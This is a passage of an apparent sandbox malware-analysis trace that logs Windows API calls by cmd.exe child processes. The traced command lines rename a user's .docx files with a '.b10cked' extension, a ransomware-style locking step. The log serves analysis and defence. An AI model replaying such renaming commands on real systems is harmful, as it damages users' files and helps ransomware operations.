(_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.449] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.449] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.450] _wcsicmp (_String1="M9MMOP~1.DOC", _String2=".") returned 63 [0136.450] _wcsicmp (_String1="M9MMOP~1.DOC", _String2="..") returned 63 [0136.450] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmop~1.doc")) returned 0x20 [0136.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.450] SetErrorMode (uMode=0x0) returned 0x0 [0136.450] SetErrorMode (uMode=0x1) returned 0x0 [0136.450] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", nBufferLength=0x104, lpBuffer=0x24f014, lpFilePart=0x24effc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", lpFilePart=0x24effc*="M9MMOP~1.DOC") returned 0x26 [0136.450] SetErrorMode (uMode=0x0) returned 0x1 [0136.450] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0136.450] _wcsicmp (_String1="M9MMOP~1.DOC", _String2=".") returned 63 [0136.450] _wcsicmp (_String1="M9MMOP~1.DOC", _String2="..") returned 63 [0136.450] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmop~1.doc")) returned 0x20 [0136.450] SetErrorMode (uMode=0x0) returned 0x0 [0136.450] SetErrorMode (uMode=0x1) returned 0x0 [0136.451] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", nBufferLength=0x104, lpBuffer=0x24f490, lpFilePart=0x24f228 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", lpFilePart=0x24f228*="M9MMOP~1.DOC") returned 0x26 [0136.451] SetErrorMode (uMode=0x0) returned 0x1 [0136.451] SetErrorMode (uMode=0x0) returned 0x0 [0136.451] SetErrorMode (uMode=0x1) returned 0x0 [0136.451] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked", nBufferLength=0x104, lpBuffer=0x24f698, lpFilePart=0x24f228 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked", lpFilePart=0x24f228*="M9MmOpgceUJDVTGEEh.docx.b10cked") returned 0x39 [0136.451] SetErrorMode (uMode=0x0) returned 0x1 [0136.451] SetLastError (dwErrCode=0x0) [0136.451] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmopgceujdvtgeeh.docx.b10cked")) returned 0xffffffff [0136.451] GetLastError () returned 0x2 [0136.451] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x24eba4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eba4) returned 0x340e70 [0136.451] FindNextFileW (in: hFindFile=0x340e70, lpFindFileData=0x24eba4 | out: lpFindFileData=0x24eba4) returned 0 [0136.452] GetLastError () returned 0x12 [0136.452] FindClose (in: hFindFile=0x340e70 | out: hFindFile=0x340e70) returned 1 [0136.452] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x351be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351be0) returned 0x340e70 [0136.453] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked", nBufferLength=0x104, lpBuffer=0x24ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked", lpFilePart=0x0) returned 0x39 [0136.453] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx", nBufferLength=0x104, lpBuffer=0x24ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx", lpFilePart=0x0) returned 0x31 [0136.453] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmopgceujdvtgeeh.docx")) returned 0x20 [0136.453] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmopgceujdvtgeeh.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\m9mmopgceujdvtgeeh.docx.b10cked"), dwFlags=0x3) returned 1 [0136.453] FindClose (in: hFindFile=0x340e70 | out: hFindFile=0x340e70) returned 1 [0136.453] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24edf0 | out: _Buffer=" 1") returned 9 [0136.453] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.453] GetFileType (hFile=0x7) returned 0x2 [0136.652] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.652] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ed7c | out: lpMode=0x24ed7c) returned 1 [0136.652] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.652] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24edb0 | out: lpConsoleScreenBufferInfo=0x24edb0) returned 1 [0136.653] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.653] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24edf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.653] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24edd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24edd4*=0x1a) returned 1 [0136.653] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.653] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.654] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.654] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.654] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.654] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.654] SetConsoleInputExeNameW () returned 0x1 [0136.654] GetConsoleOutputCP () returned 0x1b5 [0136.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.654] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.654] exit (_Code=0) Process: id = "140" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0xbe8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13694 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13695 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13696 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13697 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 13698 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13699 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13700 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13701 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13702 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 13703 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14031 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14032 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14033 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14034 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 14035 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 14036 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14037 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14038 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14039 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14040 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14041 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14042 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14043 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14044 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14117 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 14118 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14119 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14120 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14121 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 14122 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 14123 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14124 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 14125 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14126 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 197 os_tid = 0xc04 [0136.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa14 | out: lpSystemTimeAsFileTime=0x26fa14*(dwLowDateTime=0x8b2c83a0, dwHighDateTime=0x1d440a9)) [0136.292] GetCurrentProcessId () returned 0xbe8 [0136.292] GetCurrentThreadId () returned 0xc04 [0136.292] GetTickCount () returned 0x2b154 [0136.292] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa0c | out: lpPerformanceCount=0x26fa0c*=19308111448) returned 1 [0136.293] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.293] __set_app_type (_Type=0x1) [0136.293] __p__fmode () returned 0x76b331f4 [0136.293] __p__commode () returned 0x76b331fc [0136.293] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.293] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.293] GetCurrentThreadId () returned 0xc04 [0136.293] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc04) returned 0x38 [0136.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.293] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.293] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.323] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9a4 | out: phkResult=0x26f9a4*=0x0) returned 0x2 [0136.323] VirtualQuery (in: lpAddress=0x26f9db, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.323] GetConsoleOutputCP () returned 0x1b5 [0136.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.326] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.326] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.326] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.348] GetEnvironmentStringsW () returned 0x3a0180* [0136.348] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0136.349] GetEnvironmentStringsW () returned 0x3a0180* [0136.349] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0136.349] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e914 | out: phkResult=0x26e914*=0x40) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0xa8, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x0, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegCloseKey (hKey=0x40) returned 0x0 [0136.349] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e914 | out: phkResult=0x26e914*=0x40) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x0, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x4) returned 0x0 [0136.349] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x1000) returned 0x2 [0136.350] RegCloseKey (hKey=0x40) returned 0x0 [0136.350] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.350] srand (_Seed=0x5b88636a) [0136.350] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"" [0136.350] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QXDEHM~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qXDEHmzN LrwSQhutJ.docx.b10cked\"" [0136.350] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.350] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.350] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.350] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.350] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.350] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.350] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.350] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.350] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.351] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.351] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.351] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.351] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.351] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.351] GetEnvironmentStringsW () returned 0x3a22d0* [0136.351] FreeEnvironmentStringsW (penv=0x3a22d0) returned 1 [0136.351] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.351] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.351] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.351] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.351] _wcsicmp 